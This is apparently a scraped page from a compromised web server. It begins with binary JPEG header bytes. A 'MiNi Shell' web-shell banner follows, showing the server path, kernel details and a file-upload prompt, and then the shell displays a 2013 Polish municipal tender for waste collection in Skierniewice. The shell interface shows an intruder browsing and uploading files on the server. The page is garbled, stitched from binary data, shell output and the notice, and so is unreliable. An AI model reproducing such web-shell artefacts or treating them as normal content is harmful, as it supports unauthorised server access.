JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130514/188590-N-2013.html

<p class="kh_header"><b>Skierniewice: ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH 
Z TERENU GMINY MIASTO SKIERNIEWICE POCHODZĄCYCH 
Z NIERUCHOMOŚCI ZAMIESZKAŁYCH</b><br>
<b>Numer ogłoszenia: 188590 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH 
Z TERENU GMINY MIASTO SKIERNIEWICE POCHODZĄCYCH 
Z NIERUCHOMOŚCI ZAMIESZKAŁYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Miasto Skierniewice pochodzących z nieruchomości zamieszkałych.
2. TRYB UDZIELENIA ZAMÓWIENIA
Postępowanie o udzielenie zamówienia publicznego prowadzone w trybie przetargu nieograniczonego na
podstawie ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), powyżej kwoty
określonej w przepisach wydanych na podstawie art. 11 ust.8 ww. ustawy.

3. OPIS PRZEDMIOTU ZAMÓWIENIA 

3.1. Charakterystyka Miasta Skierniewice
3.1.1 Powierzchnia
Powierzchnia Miasta Skierniewice  wynosi  3.450,3 ha (34,503 km2)
3.1.2.  Liczba mieszkańców
Liczba mieszkańców Miasta Skierniewice na koniec 2012 r. wynosiła  48.929, w tym około 27871  osób  w zabudowie wielorodzinnej i około 21058  osób w zabudowie jednorodzinnej.

3. 2. Szczegółowy opis przedmiotu  zamówienia
CPV
.	90000000 - 7 Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne
.	90513200 - 8 Usługi wywozu stałych odpadów miejskich
.	90500000 - 2 Usługi związane z odpadami
.	90533000 - 2 Usługi gospodarki odpadami
.	90514000 - 3 Usługi recyklingu odpadów

Przedmiotem zamówienia  jest odbieranie i zagospodarowanie (odzysk lub unieszkodliwianie) wskazanych w opisie zamówienia odpadów komunalnych  z terenu gminy miasto Skierniewice, pochodzących z nieruchomości zamieszkałych, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania  do ponownego  użycia   i odzysku  innymi metodami  oraz ograniczenie  masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami  ustawy z dnia 13 września 1996r. o utrzymaniu  czystości i porządku w gminach (tekst jednolity                Dz. U.  z 2012 r. poz. 391, z późn. zm.), przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013r. poz. 21)  zapisami Wojewódzkiego  Planu Gospodarki Odpadami, przyjętego uchwałą Nr XXVI.481.12  Sejmiku Województwa Łódzkiego z dnia 21 czerwca 2012 r.  w sprawie przyjęcia Planu gospodarki  odpadami województwa łódzkiego 2012, zapisami  (przepisami) Regulaminu utrzymania czystości porządku  na terenie Miasta Skierniewce wprowadzonego uchwałą Rady Miasta Skierniewice Nr XXXIV.26.13 z dnia 25 marca 2013r. oraz zapisami uchwały Rady Miasta Skierniewice Nr XXXIV.27.13 z dnia 25marca 2013r.   w sprawie ustalenia szczegółowego sposobu i zakresu świadczenia usług     w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy.
Urządzenia do gromadzenia  odpadów (pojemniki, kontenery), które zostaną ustawione   w miejscach gromadzenia  odpadów wskazanych przez  Zamawiającego, zapewnia Wykonawca.
Szczegółowe dane dotyczące ilości budynków jedno i wielorodzinnych, ilości miejsc                      do gromadzenia odpadów (altanki śmietnikowe, komory zsypowe, wyznaczone miejsca                  na pojemniki), ilości i rodzaju niezbędnych pojemników przedstawiono w pkt 4.  SIWZ.

3.2.1. Zabudowa jednorodzinna

Gromadzenie i odbiór odpadów komunalnych zgodnie z załącznikiem Nr 1 do uchwały        Nr XXXIV.27.13 z dnia 25marca 2013r.   
Odbiór odpadów w godzinach 6:00 - 20:00.
Zabudowa jednorodzinna
Lp.	Rodzaj odpadu	Pojemnik	Częstotliwość odbioru
1.	Zmieszane odpady komunalne             lub  odpady po wstępnej segregacji	Nie mniejszy niż 0, 120 m3  	Nie rzadziej niż dwa razy                w miesiącu
2.	Papier, tektura, tworzywa sztuczne, opakowania  wielomateriałowe, metale (tzw. odpady suche)	0, 240 m3	Nie rzadziej niż 1 raz w miesiącu
3.	Szkło w formie zmieszanej	0, 120 m3	Nie rzadziej niż 1 raz na kwartał
4.	Odpady  ulegające  biodegradacji, w tym zielone	0, 120 m3	Nie rzadziej niż 1 raz w miesiącu
5.	Meble, odpady wielkogabarytowe, sprzęt elektryczny i elektroniczny, zużyte opony, baterie i akumulatory 	tzw. Wystawka 	Przynajmniej  1 raz na rok
6. 	odpady komunalne ulegające biodegradacji,  w tym odpady zielone, tworzywa sztuczne,opakowania wielomateriałowe,metale, szkło, ubrania i tekstylia, papier, tektura, odpady wielkogabarytowe,odpady elektryczne i elektroniczne, baterie i akumulatory, chemikalia (farby, lakiery, rozpuszczalniki, odpadowe oleje),przeterminowane leki,odpady  budowlano-rozbiórkowe , zużyte opony 	Dowóz własnym transportem	Wywóz na GPSZOK
Ilość  i rodzaj  urządzeń do gromadzenia odpadów: pojemników, kontenerów podano             w       pkt 4   SIWZ.

3.2.2.  Zabudowa wielorodzinna

Gromadzenie i odbiór odpadów komunalnych zgodnie z załącznikiem Nr 2 do uchwały         Nr XXXIV/ 27/13 z dnia 25 marca 2013r.   
Odbiór odpadów w godzinach 6:00 - 20:00.

Zabudowa wielorodzinna 
Lp.	Rodzaj odpadu	Pojemnik	Częstotliwość odbioru
1.	Zmieszane odpady komunalne lub  odpady po wstępnej segregacji	Kontener                   o pojemności nie mniejszej niż 1,1 m3	Nie rzadziej niż 2 razy w tygodniu
2.	Odpady  gromadzone selektywnie  w gniazdach 	Pojemnik                   o pojemności nie mniejszej niż 1,0 m3	Nie rzadziej niż 2 razy w miesiącu
3.	Odpady  ulegające  biodegradacji, w tym zielone	Kontener                  o pojemności nie mniejszej niż 1, 1 m3	Nie rzadziej niż 2 raz w tygodniu
4. 	Odpady wielkogabarytowe (mebele), sprzęt elektryczny i elektroniczny, zużyte opony, baterie i akumulatory	tzw. wystawka w pergolach lub obok nich 	Nie rzadziej niż 1 raz w miesiącu
5. 	tworzywa sztuczne,opakowania wielomateriałowe,metale, szkło, ubrania i tekstylia, papier, tektura, odpady wielkogabarytowe,odpady elektryczne i elektroniczne, baterie i akumulatory, chemikalia (farby, lakiery, rozpuszczalniki, odpadowe oleje),przeterminowane leki,odpady  budowlano-rozbiórkowe,  zużyte opony 	Dowóz własnym transportem	Wywóz na GPSZOK


Ilość  i rodzaj  urządzeń do gromadzenia odpadów: pojemników, kontenerów podano             w       pkt 4   SIWZ.


3.2.3. Gminny Punkt Selektywnej Zbiórki Odpadów Komunalnych
a) W czasie wykonywania umowy jednak nie później niż do dnia 1 stycznia 2014 r, Wykonawca zorganizuje na terenie miasta GPSZOK i będzie przyjmował dostarczane przez mieszkańców miasta Skierniewice następujące rodzaje odpadów: 
-  Przeterminowane leki  kod 20 01 31, 20 01 32,
-  Chemikalia (farby, rozpuszczalniki, oleje odpadowe)  kod 20 01 13*, 20 01 14*,                 20 01  15*,   20 01 19*, 20 01 27*, 20 01 29*,
-  Zużyte baterie akumulatory  kod 20 01 33* 20 01 34,
-  Zużyty sprzęt elektryczny i elektroniczny  kod 20 01 23, 20 01 35*, 20 01 36,
-  Odpady wielkogabarytowe  kod 20 03 07,
-  Odpady budowlano - rozbiórkowe z grupy 17,
-  Zużyte opony  kod 16 01 03,
-  Odpady ulegające biodegradacji (odpady zielone)  kod 20 02 01,
- Szkło kod 20 01 02, opakowania ze szkła kod 15 01 07,
-  Tworzywa sztuczne kod 20 01 39,opakowania z tworzyw sztucznych o kodzie 15 01 02,
-  Papier i tektura kod 20 01 01, opakowania z papieru i tektury o kodzie 15 01 01.
b) Wykonawca wyposaży  GPSZOK  w odpowiednią ilość pojemników, miejsc lub  boksów do tymczasowego gromadzenia  odpadów wymienionych w pkt 3 ppkt 3 litera a
-  Przeterminowane leki - pojemnik o pojemności przynajmniej 240l,
-  Chemikalia (farby, rozpuszczalniki, oleje odpadowe) - szczelny  kontener,
-  Zużyte baterie, akumulatory - pojemnik o pojemności przynajmniej 120 l,
-  Zużyty sprzęt elektryczny i elektroniczny - wyznaczone miejsce, boks lub kontener,
-  Odpady wielkogabarytowe - wyznaczone miejsce, boks lub kontener,
-  Odpady budowlano - rozbiórkowe - boks lub  kontener o pojemności przynajmniej 5,5 m3,
-  Zużyte opony - wyznaczone miejsce lub kontener,
-  Odpady zielone - kontener o pojemności przynajmniej 7,0 m3 ,
-  Szkło, opakowania ze szkła - kontener lub pojemnik o  pojemności przynajmniej 1,1 m3,
-  Tworzywa sztuczne, opakowania z tworzyw sztucznych - kontener lub pojemnik                  o  pojemności  przynajmniej 1,1 m3 ,
- Papier tektura, opakowania z papieru i tektury - kontener lub pojemnik o  pojemności przynajmniej 1,1 m3.
c) Wykonawca winien wywozić z GPSZOK ww. odpady z częstotliwością  wynikającą      z potrzeb oraz z uwzględnieniem  zapełnienia pojemników, boksów itp. 

4. SZCZEGÓŁOWE  DANE CHARAKTERYZUJĄCE  ZAMÓWIENIE
- liczba budynków jednorodzinnych oraz liczba  miejsc do  gromadzenia odpadów - 5500
- liczba budynków wielorodzinnych - 135
- liczba miejsc do gromadzenia odpadów w zabudowie wielorodzinnej (altanki zsypy, miejsca ustawienia pojemników) - 350 
- Liczba i rodzaj pojemników do gromadzenia odpadów komunalnych o poszczególnych pojemności:
 a) w zabudowie jednorodzinnej: 
-  120 l z oznaczeniem czarnym  lub   innym kolorem niż pojemniki  na odpady segregowane,    z przeznaczeniem do gromadzenia   zmieszanych  odpadów komunalnych lub  odpadów        po wstępnej segregacji - 5500 sztuk,
-   240 l z oznaczeniem żółtym na odpady suche   - 5500 sztuk,
-  120 l z oznaczeniem pomarańczowym na szkło w formie zmieszanej  -   5500 sztuk .
-  120 l z oznaczeniem brązowym na bioodpady  -   5500 sztuk od 30 czerwca 2014r.     
b) zabudowa wielorodzinna 
-  1.100 l  z oznaczeniem czarnym lub  innym kolorem niż pojemniki  na odpady segregowane  - 350 sztuk
-  1.100 l z oznaczeniem brązowym na bioodpady  - 350 sztuk  od 30 czerwca 2014r.
- pojemniki do gromadzenia odpadów segregowanych w gniazdach o pojemności                  nie  mniejszej niż 1,0 m3 w kolorach
1)	zielonym - z  napisem  szkło kolorowe  -  100 szt.,   
2)	białym -  z napisem  szkło bezbarwne - 100 szt.,   
3)	żółtym i osiatkowanym - z  napisem tworzywa sztuczne,  PET - 100 szt. łącznie,  
4)	niebieskim - z napisem papier - 100 szt.  

5. OBOWIĄZKI WYKONAWCY PRZED ROZPOCZĘCIEM I W TRAKCIE  REALIZACJI  ZAMÓWIENIA
5.1. Wykonawca otrzyma na 7 dni  przed rozpoczęciem  zamówienia od Zamawiającego szczegółowy wykaz adresów nieruchomości objętych umową  odbioru oraz miejsc                       do gromadzenia odpadów. Do wykazu Zamawiający załączy również harmonogram odbioru odpadów dla terenów zabudowy jednorodzinnej obejmujący poszczególne ulice.
5.2. Wykonawca ma obowiązek wyposażenia  miejsc gromadzenia odpadów w niezbędne pojemniki  przed pierwszym dniem obowiązywania umowy na odbiór odpadów, zawartej        z Zamawiającym. Potwierdzeniem dostarczenia pojemników przez Wykonawcę, będzie przedłożenie Zamawiającemu oświadczenia o dostarczeniu pojemników na posesje zlokalizowane na terenie miasta Skierniewice 
5.3. Wykonawca jest zobowiązany do  przedkładania  Zamawiającemu raportów miesięcznych, zawierających informację o ilości i rodzaju wydanych w danym miesiącu  pojemników, w terminie  10 dni od zakończenia danego miesiąca.
5.4. W trakcie wykonywania umowy wyposażenie zgłoszonych przez Zamawiającego miejsc gromadzenia odpadów w niezbędne pojemniki  następuje  najpóźniej  w ciągu 5 dni roboczych na zasadach opisanych w pkt 5. 2.
5.5. Zamawiający  odpowiada za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów  odpadów. W tym celu sporządza harmonogramy odbioru, które będą publikowane  na stronie internetowej www.skierniewice.net.pl w formie wydruków, które  przekaże do dystrybucji Wykonawcy.  Wykonawca obowiązany jest w ramach umowy na odbiór odpadów  zawartej z Zamawiającym do dystrybucji innych  dokumentów związanych z Systemem Gospodarki Odpadami w Skierniewicach o ile nie wymagają one potwierdzenia odbioru.
Poprzez określenie - inne dokumenty  związane z Systemem Gospodarki Odpadami                         w Skierniewicach o ile nie wymagają one  potwierdzenia odbioru   Zamawiający rozumie  ulotki informacyjne kierowane do właścicieli  nieruchomości jednorodzinnych  w ramach SGO.
5.6.  Wykonawca odpowiada  za stan porządkowy, techniczny i sanitarny  pojemników            i kontenerów  do gromadzenia odpadów. Na wezwanie Zamawiającego, Wykonawca jest zobowiązany  do ich napraw lub wymiany uszkodzonych  lub zniszczonych pojemników.
5.7.  Wykonawca jest zobowiązany do zebrania i zabrania odpadów  leżących obok altanek  śmietnikowych i pojemników. 
5.8. Wykonawca będzie regularnie  przekazywał sprawozdania z wykonanych usług, zgodnie z ustawą o utrzymaniu  czystości i porządku w gminach.

5.9. Wykonawca ubezpieczy  na własny  koszt pojemniki  i kontenery  oraz  zabezpieczy  je od ryzyka  związanego z uszkodzeniem lub kradzieżą.
5.10. Za szkody w majątku Zamawiającego  lub osób trzecich spowodowane w trakcie odbioru odpadów odpowiedzialność ponosi Wykonawca. 
5.11. Wykonawca zobowiązany jest do przestrzegania  obowiązujących  w trakcie trwania  umowy przepisów prawnych, a zwłaszcza:
a) ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jednolity Dz. U.            z 2008r. Nr 25, poz. 150, z  późn. zm.),
b) ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21)
c) ustawy z dnia 13 stycznia 1996r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. z 2012 r poz. 391, z późn. zm.),
d) uchwały Rady Miasta Skierniewice  Nr XXXIV/26/13 z dnia 25 marca 2013r.  w sprawie uchwalenia Regulaminu  czystości i  porządku w Mieście Skierniewice. 
5.12. Odpady zebrane  od właścicieli nieruchomości z terenu Miasta Skierniewice, Wykonawca zobowiązany jest  zagospodarować (poddać przetworzeniu), zgodnie                  z obowiązującymi prawem, w tym niesegregowane (zmieszane)  odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych                     do składowania, przekazywać do regionalnych  instalacji przetwarzania odpadów komunalnych oraz przedstawienia  Zamawiającemu jeden raz w miesiącu dowodów potwierdzających  wykonanie czynności, to jest karty przekazania odpadów.
5.13. Wykonawca odpowiedzialny jest za osiągnięcie  poziomów odzysku odpadów  komunalnych  z uwzględnieniem poziomów odzysku  wskazanych w ustawie  z dnia             13 września o utrzymaniu czystości  i porządku w gminach, Rozporządzeniem Ministra Środowiska z dnia  29 maja 2012 roku w sprawie   poziomów recyklingu, przygotowania do  ponownego użycia i odzysku innymi metodami  niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645)  oraz Rozporządzeniu  Ministra Środowiska  z dna 25 maja 2012 roku  w sprawie poziomów  ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676).
5.14. Zamówienie  nie obejmuje  odbierania odpadów komunalnych od właścicieli nieruchomości, na których nie zamieszkują  mieszkańcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających zgodnie z art. 67, ust. 1, pkt 6 Ustawy Pzp. Zamówienia uzupełniające stanowić mogą nie więcej niż 50% wartości zamówienia podstawowego i polegać będą na powtórzeniu zamówienia takiego samego rodzaju.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.32.00-8, 90.50.00.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium.
Kwota wadium wynosi 100.000,00 zł (słownie: sto tysięcy złotych). Wadium wnosi się przed upływem  składania  ofert
2.	Wadium może być wniesione w następujących formach: 
pieniądzu, na rachunek nr konta: Powszechna Kasa Oszczędności Bank Polski SA              nr 81 1020 3352 0000 1402 0193 3969 z  dopiskiem wadium -ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY MIASTO SKIERNIEWICE POCHODZĄCYCH Z NIERUCHOMOŚCI ZAMIESZKAŁYCH
2.1. Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.2.	Gwarancjach bankowych, 
2.3. Gwarancjach ubezpieczeniowych, 
2.4.    Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3.	Wadium wnosi się przed upływem terminu składania ofert.
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w kasie. 
5.	Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które            do dnia 24.06. 2013 r., do godz. 10:00 włącznie, znajdzie się na koncie Zamawiającego. 
6.	Zamawiający zwraca wadium w przypadkach określonych w art. 46 ustawy Prawo zamówień publicznych.
7.	Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone     w art. 22, ust. 1 pkt. 1-4 ustawy Pzp dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2)	posiadania wiedzy i doświadczenia,
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami  zdolnymi         do wykonywania zamówienia,
4)	sytuacji ekonomicznej i finansowej.                                                       

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu    na podstawie art. 24 ust. 1 ustawy Pzp. 

Wykonawcy ubiegający się o udzielenie zamówienia muszą wykazać brak podstaw               do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 26 ust.  2d Ustawy Pzp.

Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,  wykonawca winien posiadać  wpis do rejestru działalności regulowanej.

Ocena spełnienia ww. warunków dokonana zostanie w oparciu o informacje  zawarte w dokumentach  i oświadczeniach wyszczególnionych w pkt 8 SIWZ.  Z treści załączonych  dokumentów  musi wynikać jednoznacznie, że ww. warunki Wykonawca spełnił.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 2 ustawy Pzp, dotyczący posiadania wiedzy i doświadczenia za spełniony, jeżeli wykonawca wykaże, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy  - w tym  okresie  wykonał usługi odbioru odpadów komunalnych wykonywanych na rzecz właścicieli nieruchomości w sposób ciągły przez okres minimum 12 miesięcy  o masie łącznej minimum 12.000 Mg rocznie.
Na dowód tego wykonawca do oferty winien załączyć: Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wraz z podaniem ich masy, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie  w sposób ciągły przez okres minimum 12 miesięcy  o masie łącznej minimum 12.000,00 Mg rocznie, zgodnie z treścią załącznika nr 5 do SIWZ. Wykaz musi potwierdzać spełnianie warunku, o którym mowa w punkcie 7.2.2 SIWZ.
Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, o którym mowa w art. 22 ust. 1 pkt. 3 ustawy Pzp, dotyczący dysponowania potencjałem technicznym jeżeli wykonawca posiada specjalistyczny sprzęt, w tym łącznie co najmniej: 6 samochodów specjalistycznych - bezpylnych       o minimalnej pojemności 10 m3, minimum 4 samochody skrzyniowe o ładowności minimalnej 3,5 Mg, minimum 2 samochody typu hakowiec, minimum 2 samochody z HDS do wyładowania pojemników na segregowane odpady z zabudowy wielorodzinnej. 
Stan techniczny i sanitarny posiadanego sprzętu musi odpowiadać warunkom  Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r.  w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz.122). 
